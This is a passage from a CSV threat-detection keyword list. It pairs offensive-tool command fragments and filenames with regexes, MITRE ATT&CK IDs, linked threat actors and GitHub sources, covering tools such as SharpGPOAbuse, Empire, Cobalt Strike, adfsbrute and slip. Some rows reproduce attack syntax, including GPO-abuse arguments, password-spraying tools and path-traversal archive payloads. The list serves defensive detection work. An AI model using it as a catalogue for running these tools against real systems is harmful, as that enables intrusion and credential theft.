TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","217" "* address-info.nse*",".{0,1000}\saddress\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","218" "* AddScriptToRegistry.ahk*",".{0,1000}\sAddScriptToRegistry\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","219" "* AddTrustedDomain.py*",".{0,1000}\sAddTrustedDomain\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","220" "* AddTrustedDomain.vba*",".{0,1000}\sAddTrustedDomain\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","221" "* --AddUserRights --UserRights * --UserAccount * --GPOName *",".{0,1000}\s\-\-AddUserRights\s\-\-UserRights\s.{0,1000}\s\-\-UserAccount\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's 
edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","222" "* --AddUserScript --ScriptName * --ScriptContents * --GPOName *",".{0,1000}\s\-\-AddUserScript\s\-\-ScriptName\s.{0,1000}\s\-\-ScriptContents\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","223" "* ADeleg.exe*",".{0,1000}\sADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","224" "* adfsbrute.py*",".{0,1000}\sadfsbrute\.py.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","0","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","225" "* --adfs-host * --krb-key * --krb-ticket 
*",".{0,1000}\s\-\-adfs\-host\s.{0,1000}\s\-\-krb\-key\s.{0,1000}\s\-\-krb\-ticket\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","226" "* ADFSpoof.py*",".{0,1000}\sADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","227" "* adfs-spray.py*",".{0,1000}\sadfs\-spray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","228" "* adhunt.py *",".{0,1000}\sadhunt\.py\s.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","229" "* adm2sys.py*",".{0,1000}\sadm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System.
This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","230" "* admin_persistence_winlogon.c*",".{0,1000}\sadmin_persistence_winlogon\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","232" "* admin-panels.txt*",".{0,1000}\sadmin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","233" "* ADPassHunt.GetGPPPassword*",".{0,1000}\sADPassHunt\.GetGPPPassword.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool developed in-house for FireEye's Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","234" "* adPEAS.ps1*",".{0,1000}\sadPEAS\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","235" "*
adPEAS_DomainPolicy.Sys*",".{0,1000}\sadPEAS_DomainPolicy\.Sys.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","236" "* adPEAS_out.txt*",".{0,1000}\sadPEAS_out\.txt.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","237" "* adPEAS-Light.ps1*",".{0,1000}\sadPEAS\-Light\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","238" "* AES_cryptor.py *",".{0,1000}\sAES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","242" "* afp-brute.nse*",".{0,1000}\safp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","243" "* afp-ls.nse*",".{0,1000}\safp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","244" "* afp-path-vuln.nse*",".{0,1000}\safp\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","245" "* afp-serverinfo.nse*",".{0,1000}\safp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","246" "* afp-showmount.nse*",".{0,1000}\safp\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","247" "* -AgentDelay *",".{0,1000}\s\-AgentDelay\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","248" "* -AgentJitter *",".{0,1000}\s\-AgentJitter\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","249" "* ajp-auth.nse*",".{0,1000}\sajp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","251" "* ajp-brute.nse*",".{0,1000}\sajp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","252" "* ajp-headers.nse*",".{0,1000}\sajp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","253" "* ajp-methods.nse*",".{0,1000}\sajp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","254" "* ajp-request.nse*",".{0,1000}\sajp\-request\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","255" "* Alcatraz.exe*",".{0,1000}\sAlcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","256" "* All_attack.txt*",".{0,1000}\sAll_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","257" "* all_in_one_enum.ps1*",".{0,1000}\sall_in_one_enum\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","258" "* allseeingeye-info.nse*",".{0,1000}\sallseeingeye\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","259" "* Amnesiac.ps1*",".{0,1000}\sAmnesiac\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","261" "* amqp-info.nse*",".{0,1000}\samqp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","262" "* amsi_disable *",".{0,1000}\samsi_disable\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","263" "* --am-si-bypass=*",".{0,1000}\s\-\-am\-si\-bypass\=.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","264" "* amsikiller.py*",".{0,1000}\samsikiller\.py.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","265" "* anti_analysis.exe*",".{0,1000}\santi_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","266" "* anti_debug.exe*",".{0,1000}\santi_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","267" "* Any passwords that were successfully sprayed have been output 
to*",".{0,1000}\sAny\spasswords\sthat\swere\ssuccessfully\ssprayed\shave\sbeen\soutput\sto.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","0","#content","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","268" "* apc_injection.exe*",".{0,1000}\sapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","269" "* api_hooking.exe*",".{0,1000}\sapi_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","270" "* App-Bound Encryption Decryption process*",".{0,1000}\sApp\-Bound\sEncryption\sDecryption\sprocess.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","271" "* --archive-type tar --mass-find * --mass-find-mode symlinks 
archive*",".{0,1000}\s\-\-archive\-type\star\s\-\-mass\-find\s.{0,1000}\s\-\-mass\-find\-mode\ssymlinks\sarchive.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","272" "* --archive-type zip --symlinks ""../etc/hosts*linkname"" archive *",".{0,1000}\s\-\-archive\-type\szip\s\-\-symlinks\s\""\.\.\/etc\/hosts.{0,1000}linkname\""\sarchive\s\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","#linux","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","273" "* --Args AntiVirus --XorKey*",".{0,1000}\s\-\-Args\sAntiVirus\s\-\-XorKey.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","274" "* --args 